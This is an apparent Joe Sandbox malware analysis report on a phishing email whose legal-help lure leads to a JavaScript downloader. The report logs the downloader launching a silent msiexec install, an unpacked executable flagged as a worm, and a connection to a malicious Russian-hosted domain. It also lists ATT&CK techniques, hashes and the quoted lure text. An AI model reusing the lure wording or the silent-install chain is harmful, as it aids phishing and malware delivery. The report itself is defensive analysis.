Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\SysWOW64\expand.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MW-3a472122-7dab-4a13-bbad-34a4c913bf53\files\b867728e2fb94adfa8d9d574fa44f90b$dpx$.tmp\393b823aa8821f409caf2aa8798668c0.tmp			Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI900C.tmp			Jump to dropped file

Source: C:\Windows\System32\OpenWith.exe TID: 4400	Thread sleep count: 33 > 30
Source: C:\Windows\System32\wscript.exe TID: 7824	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 7632	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	File Volume queried: C:\Windows\SysWOW64 FullSizeInformation
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 185.172.129.102 443

Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\MyCase_09.2024_825.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\setup.msi" /qn
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start msedge https://www.docusign.com/sites/default/files/Signature_Appliance_Client_Guide_8.0.pdf

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Replication Through Removable Media	Windows Management Instrumentation	1 Browser Extensions	111 Process Injection	21 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scripting	1 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	111 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	Login Hook	1 Rundll32	NTDS	11 Peripheral Device Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Source	Detection	Scanner	Label	Link
C:\Windows\Installer\MSI900C.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MW-3a472122-7dab-4a13-bbad-34a4c913bf53\files\b867728e2fb94adfa8d9d574fa44f90b$dpx$.tmp\393b823aa8821f409caf2aa8798668c0.tmp	24%	ReversingLabs	Win32.Worm.Generic

Name	IP	Active	Malicious	Reputation
svc.ms-acdc-teams.office.com	52.123.243.81	true	false	unknown
urldefense.com	52.6.56.188	true	false	unknown
meatmsges.com	185.172.129.102	true	true	unknown
www.google.com	216.58.212.164	true	false	unknown
googlehosted.l.googleusercontent.com	142.250.185.193	true	false	unknown
s3-website-ap-northeast-1.amazonaws.com	52.219.68.204	true	false	unknown
clients2.googleusercontent.com	unknown	unknown	false	unknown
hub-res.selvas.com	unknown	unknown	false	unknown
bzib.nelreports.net	unknown	unknown	false	unknown
www.docusign.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://hub-res.selvas.com/market/fatalraid/zh-HK/hub.html?download_url=https://meatmsges.com	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.113.194.132	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.185.99	unknown	United States	15169	GOOGLEUS	false
52.219.68.204	s3-website-ap-northeast-1.amazonaws.com	United States	16509	AMAZON-02US	false
51.132.193.105	unknown	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
216.58.212.164	www.google.com	United States	15169	GOOGLEUS	false
74.125.133.84	unknown	United States	15169	GOOGLEUS	false
142.250.181.227	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.172.129.102	meatmsges.com	Russian Federation	204154	FIRST-SERVER-US-ASRU	true
52.6.56.188	urldefense.com	United States	14618	AMAZON-AESUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523622
Start date and time:	2024-10-01 21:10:58 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Sample name:	Seeking Assistance for Legal Assistance in a Medical Matter.msg
Detection:	MAL
Classification:	mal72.evad.winMSG@37/29@16/87
Cookbook Comments:	Found application associated with file extension: .msg

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.113.194.132
Excluded domains from analysis (whitelisted): ecs.office.com, s-0005.s-msedge.net, ecs.office.trafficmanager.net, s-0005-office.config.skype.com, ecs-office.s-0005.s-msedge.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Timeout during stream target processing, analysis might miss dynamic analysis data
VT rate limit hit for: Seeking Assistance for Legal Assistance in a Medical Matter.msg

LLM Input / Output

Input

Output

URL: Email Model: jbxai

{
"brand":[],
"contains_trigger_text":true,
"trigger_text":"I am in need of legal assistance for a challenging situation related to medical law. Due to the confidential nature of this matter prepared a comprehensive file outlining the specifics.",
"prominent_button_name":"Download document.",
"text_input_field_labels":[],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":true,
"has_visible_qrcode":false}

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	data
Category:	dropped
Size (bytes):	231348
Entropy (8bit):	4.391867367695122
Encrypted:	false
SSDEEP:
MD5:	B9F25A3C0E3A68CA35E7ADF1D7E2A1C7
SHA1:	7CFD2D6A26BAC1AEE8255A86491F0583B11CBD08
SHA-256:	8F8422273DCFE6D793FC79C8FA33FCC1173E8F1980651BB87EFA186FAA453617
SHA-512:	28A0163999A951C3D42076C6404AD58DAA997EA53E656A15BB4C0DB8CAA285C2944930439742F2F36D08C5293924C4E07A87CE9FF1BA5220ABDF2D36D5B8ACB4
Malicious:	false
Reputation:	unknown
Preview:	TH02...... .....5.......SM01X...,.......5...........IPM.Activity...........h...............h............H..h.......g.....h...........H..h\cal ...pDat...h.{..0...@......hHe.l...........h........_`Pk...h.d.l@...I.lw...h....H...8.Uk...0....T...............d.........2h...............k..............!h.............. hVI......X.....#h....8.........$h.......8....."h......P.....'h..^...........1hHe.l<.........0h....4....Uk../h....h.....UkH..h@...p.......-h .............+h.e.l....................... ..............F7..............FIPM.Activity.st.Form.e..Standard.tanJournal Entry.pdIPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.000Microsoft.ofThis form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..

C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.04509919162171007
Encrypted:	false
SSDEEP:
MD5:	A2259E34A12AECDEEB73568E37B00D70
SHA1:	998AADD1AFC1D4A033D285C13DAFE71E732FB5AF
SHA-256:	2E3F17016869DD86A456A4ADE7C2AB65EF4C5BD15CCE9BBD31C58EB782FF17CA
SHA-512:	E048B234808392F0EEBF13976D9215DA71C64D634EDF6CDF6D3BDEDD6B21D3EFE973522F3AE91899D341A5AFB893540E560D68D9C22FEB9D5C357CE79C8B7541
Malicious:	false
Reputation:	unknown
Preview:	..-......................c..9&{P.O..j..A.C..X....-......................c..9&{P.O..j..A.C..X..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	modified
Size (bytes):	49472
Entropy (8bit):	0.482138562066492
Encrypted:	false
SSDEEP:
MD5:	6187D1660F9CFFA7468D883B9A2B3B85
SHA1:	AD2BB894420C097496AF1FB714AB910E1029BE95
SHA-256:	E375645CCE514C497AF7211C4E56061274856D6EA54EDDB0BD4E1AFAA53FB117
SHA-512:	4986BC7F72AE0FA3FF1C9325BA02EFC5D463F27CB744881ACC341D1D517A082D6CF3694C42658445FD523113BCFA61DFA9A34059AC834F875CAB7EEBFDBCA69B
Malicious:	false
Reputation:	unknown
Preview:	7....-...........O..j..A..R ../.........O..j..A.....5..SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{BA8BC689-4508-42A7-860E-72A84D5DEA87}.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	data
Category:	modified
Size (bytes):	3312
Entropy (8bit):	3.005465342908837
Encrypted:	false
SSDEEP:
MD5:	2CF8804A7B33FB28FDF6391194CBF918
SHA1:	2933056D806FD31CD7BC33F7FCB7DCBDBE0B0AC3
SHA-256:	C2E008850ABA55C7EBEA95B6AE6D6947595FC53636B9B07E1C91ECCD4124851D
SHA-512:	A2CF77AB8E0EEA13BAB16E9F7934760D18D2789A3985CA35CBA02A6235F29DCDE5B728734D37A5A8C647B1193B26F037BC3F24D01F35C44BD86ADCFD277FAD89
Malicious:	false
Reputation:	unknown
Preview:	....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...l...............................4...8...........................................................................................................................................................................................................................................................................................................$..$.If....:V.......t.....6......4........4........a....*...$..$.If........!v..h.#v....:V.......t.....6......5.......4........4.

C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1727809889449589100_788F31EA-2F3C-4272-B9FF-0982A142ACBB.log

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	ASCII text, with very long lines (28767), with CRLF line terminators
Category:	dropped
Size (bytes):	20971520
Entropy (8bit):	0.16092134177264614
Encrypted:	false
SSDEEP:
MD5:	C1E1074CA38B830D3F265BBAF0FD3231
SHA1:	10818E4903E07B2FD834F0017D9F96D2CE7AD74D
SHA-256:	B9928C6D74985730D837F2C7A5C2FB45642B3C0E54E81433ACA58F0221E8C5A0
SHA-512:	1C7C5D3F17C1F271D38F1B7DF826C84E9E63D4B4A637CB31E29FF0DEC0FECD5520D61DE161DC57E2D544CB31B799FE9B5197BF03C2BDE008C015ABA8D8FF8B36
Malicious:	false
Reputation:	unknown
Preview:	Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..10/01/2024 19:11:29.479.OUTLOOK (0x1304).0x1050.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":26,"Time":"2024-10-01T19:11:29.479Z","Contract":"Office.System.Activity","Activity.CV":"6jGPeDwvckK5/wmCoUKsuw.4.11","Activity.Duration":11,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...10/01/2024 19:11:29.495.OUTLOOK (0x1304).0x1050.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":28,"Time":"2024-10-01T19:11:29.495Z","Contract":"Office.System.Activity","Activity.CV":"6jGPeDwvckK5/wmCoUKsuw.4.12","Activity.Duration":9723,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorV

C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1727809889450241600_788F31EA-2F3C-4272-B9FF-0982A142ACBB.log

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	data
Category:	dropped
Size (bytes):	20971520
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	8F4E33F3DC3E414FF94E5FB6905CBA8C
SHA1:	9674344C90C2F0646F0B78026E127C9B86E3AD77
SHA-256:	CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
SHA-512:	7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MW-3a472122-7dab-4a13-bbad-34a4c913bf53\files.cab

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 1700848 bytes, 1 file, at 0x2c +A "setup.exe", ID 17323, number 1, 20816 datablocks, 0x1503 compression
Category:	dropped
Size (bytes):	1700848
Entropy (8bit):	5.547863013654898
Encrypted:	false
SSDEEP:
MD5:	496D69D7A02ED5F3876D10FA11A9826D
SHA1:	D492F416D2828033CA04DC6AEC2D4A79A910AF7B
SHA-256:	4D2F5CBD1475E850A2EC7F37132E8F3FD5B106AE317C7D7C10E431B7512351DE
SHA-512:	E857B8AB4CEC0E6A31773A7803FAF092976C8B1F4043DDAAFEB7EA683DCEC8745CC16A8680E967823B945A95D96C2667B22BF65AA85A79B523372BE73A5D2331
Malicious:	false
Reputation:	unknown
Preview:	MSCF............,................C..F...PQ....(......>Y.3 .setup.exe..G...@..[...5 ..q.....4!.P..._e....d.jE(...6~...$...._....T..J......o...o7E_......:......}....PB.`Kt.f.%.}..%f...Y`....:.+...NY....O.v;.l).ne.F<Q.+.=....F6@R.Mk.H.A..&...T6u.#)...F.DI...Mr..b.?K..J.. 4.T4`ef......s33./K.\|.....9RIU?N9...m....#Z`l. .....[DK.[D.b......c.`s.N...).^..l.......H..w....P....g........O<..B....DW0..\|.4.4^.Rq.>CqD.~...vnFld)..V\|..........x......g............Xm.a..!....K.....b.J.`.......6o+=.e...>,.>l......Q.K:t..q7.<..$\H)...F+....9...H<.4..}:.....8ul.E&K...D.~..........(.(.........u6......'.X...`......Rq<q....Zn....z8......sF{.....Yx.c'....y.....O..6...W..F..v}p.t......A.....@. #[...7..=.U%..X..f._.... ...,....G.\........L .5+.DH....HK.)J..;..4......r..[-`..C..{..).-.....M..F....u..V......J.5n.B..a.....9.X.rt.1.(]..X.V.FTdlA.)^..$Pu.F.2.8.P......>l...,..X..E..6..rn9"...(..G.N!...C...32.pK.7....+LCb..:....R.....,%.Px..Z..*.K..n..,.K7. ...2.Z..>

C:\Users\user\AppData\Local\Temp\MW-3a472122-7dab-4a13-bbad-34a4c913bf53\files\b867728e2fb94adfa8d9d574fa44f90b$dpx$.tmp\393b823aa8821f409caf2aa8798668c0.tmp

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	682091520
Entropy (8bit):	0.049407338908580144
Encrypted:	false
SSDEEP:
MD5:	1289E85183CF147507BF9A13D805513C
SHA1:	B9146A0E294631BDFEE565FD6B870F72C516F655
SHA-256:	BACB25819805BDC20C66FFA9D115C41CB3EB4B0B691F4A21B362C377A5CC4D7B
SHA-512:	0668AEF3CE1FE9FA6DAA1F221B9024EB8E9ED8C877B8CDBE6596FDB3C4CDB6905B1669A08FA8C5DA82D3185277C500E6ECE5CD78797428C390D4B7835D3FA038
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....I.f..........................................@...........................#.....C=.(..@.................................(...x.............................#..............................K.......................................................text............................... ..`.rdata........... ..................@..@.data............>..................@....00cfg...............2..............@..@.tls.................4..............@....voltbl.,............6...................rsrc................8..............@..@.reloc........#.......".............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MW-3a472122-7dab-4a13-bbad-34a4c913bf53\msiwrapper.ini

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1684
Entropy (8bit):	3.7224670268743694
Encrypted:	false
SSDEEP:
MD5:	D071FEB71DA879FB97CFF3D979CD7B8C
SHA1:	E02A9BC1BB5AAF6F8E050BDCDE12A1CD53095D16
SHA-256:	47CEB93A7105E5B9FD7BC1E41FE685C2BD3DB77463DE812FDD551E7BB705424D
SHA-512:	9F16100C00BF7D293AF17C9F0F42E2552B0C51AAF5CCD60D2503327A32E49B1D5CF6F1BDA3ED03A88525125A94261F3129B179CD546A97EF3DFECAB9299B4BE6
Malicious:	false
Reputation:	unknown
Preview:	W.r.a.p.p.e.d.A.p.p.l.i.c.a.t.i.o.n.I.d.=.G.o.o.g.l.e. .C.h.r.o.m.e...W.r.a.p.p.e.d.R.e.g.i.s.t.r.a.t.i.o.n.=.N.o.n.e...I.n.s.t.a.l.l.S.u.c.c.e.s.s.C.o.d.e.s.=.0...E.l.e.v.a.t.i.o.n.M.o.d.e.=.n.e.v.e.r...B.a.s.e.N.a.m.e.=.s.e.t.u.p...e.x.e...C.a.b.H.a.s.h.=.4.d.2.f.5.c.b.d.1.4.7.5.e.8.5.0.a.2.e.c.7.f.3.7.1.3.2.e.8.f.3.f.d.5.b.1.0.6.a.e.3.1.7.c.7.d.7.c.1.0.e.4.3.1.b.7.5.1.2.3.5.1.d.e...S.e.t.u.p.P.a.r.a.m.e.t.e.r.s.=./.V.E.R.Y.S.I.L.E.N.T. . ./.V.E.R.Y.S.I.L.E.N.T. ...W.o.r.k.i.n.g.D.i.r.=...C.u.r.r.e.n.t.D.i.r.=..S.O.U.R.C.E.D.I.R....U.I.L.e.v.e.l.=.2...F.o.c.u.s.=.n.o...S.e.s.s.i.o.n.D.i.r.=.C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.3.a.4.7.2.1.2.2.-.7.d.a.b.-.4.a.1.3.-.b.b.a.d.-.3.4.a.4.c.9.1.3.b.f.5.3.\...F.i.l.e.s.D.i.r.=.C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.3.a.4.7.2.1.2.2.-.7.d.a.b.-.4.a.1.3.-.b.b.a.d.-.3.4.a.4.c.9.1.3.b.f.5.3.\.f.i.l.e.s.\...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.F.i.l.e.=.c.m.d...e.x.e...R.u.n.B.e.f.o.

C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241001T1511290258-4868.etl

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	data
Category:	modified
Size (bytes):	90112
Entropy (8bit):	4.442970499811551
Encrypted:	false
SSDEEP:
MD5:	A2E2FD7386CDB4DD8B7CD624FDECE4CE
SHA1:	4EB63EAAD15BCE95D08E74F4418E20F06C4A7F36
SHA-256:	BB5CA414DAB5803F48C3BD82525B95B3E0C099A8F4AE5F7A84F93F8CAF78317A
SHA-512:	D8732D0D103DCBA0406DB2619FA5AC40555A7E500D14B3965686A26172BA250834CDDD82C1516E9AF5DC0471AF85498C74BE832DAC06A882A5C43494F4959151
Malicious:	false
Reputation:	unknown
Preview:	............................................................................`...P........k!.5...................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................R0..Y...........k!.5...........v.2._.O.U.T.L.O.O.K.:.1.3.0.4.:.9.e.0.7.5.1.c.b.c.7.5.f.4.8.a.3.8.1.6.3.9.3.9.1.4.a.c.4.d.c.b.5...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.1.0.0.1.T.1.5.1.1.2.9.0.2.5.8.-.4.8.6.8...e.t.l.......P.P.P........k!.5...........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFC80FC6DE138A2545.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	data
Category:	dropped
Size (bytes):	163840
Entropy (8bit):	0.4387199882305656
Encrypted:	false
SSDEEP:
MD5:	2E1775BDD3692E22BB045AA985DEA40B
SHA1:	245B05C0C27057675D26DF07C9C6DBE7C37FA8D2
SHA-256:	33056E33F9EB21A93AFED6EE849837EE58185223BD7854F943D3BA125127F162
SHA-512:	DC25E547612EAC1C0597ED973EB3C1283682E308B5D008976FFEF8D9EC570F97600ED7D5906873F68ADAC897CEA1545E13575040A0EB86DBA352D6C559B69342
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	data
Category:	dropped
Size (bytes):	30
Entropy (8bit):	1.2389205950315936
Encrypted:	false
SSDEEP:
MD5:	CB0926D2047117694198965603CCCCC8
SHA1:	BDD9604C5F87C3A7AAAFE344642084AE05EC1916
SHA-256:	4A53688D653BC69B5A0ED607F78619FB5855A508F2ECA5F7A33295F645269193
SHA-512:	C8A90F382FAEC2F4F77E25E6A13C963AE95ECA2555B8FFC7491561D6474D36DE03A607ED7E0F8DD1F2E67AAA87E02CAB0E5129EE74AB3D58037994796044DC21
Malicious:	false
Reputation:	unknown
Preview:	....A.........................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 1 18:11:42 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.976816540306336
Encrypted:	false
SSDEEP:
MD5:	3EACF0D1C39E72560254B4E020AA96E9
SHA1:	3B1908D8279BCAAE1B3D571639635D45C34DE0D6
SHA-256:	8438AEB6340D728C3E37961DE3CCFF6BAF6B8EE55C344BC14AF37EE3198806B9
SHA-512:	BCC7F1662101AE5DEB96F7BEF4058E612F3AA510563FA0D42B6E5F836AEE1E5099C64DD97045C3B36525E419A23292A13A9B60A557A9787D091FB20D857DE3C8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....?...5...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IAYf.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VAYt.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VAYt.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VAYt............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VAYu............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........op.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

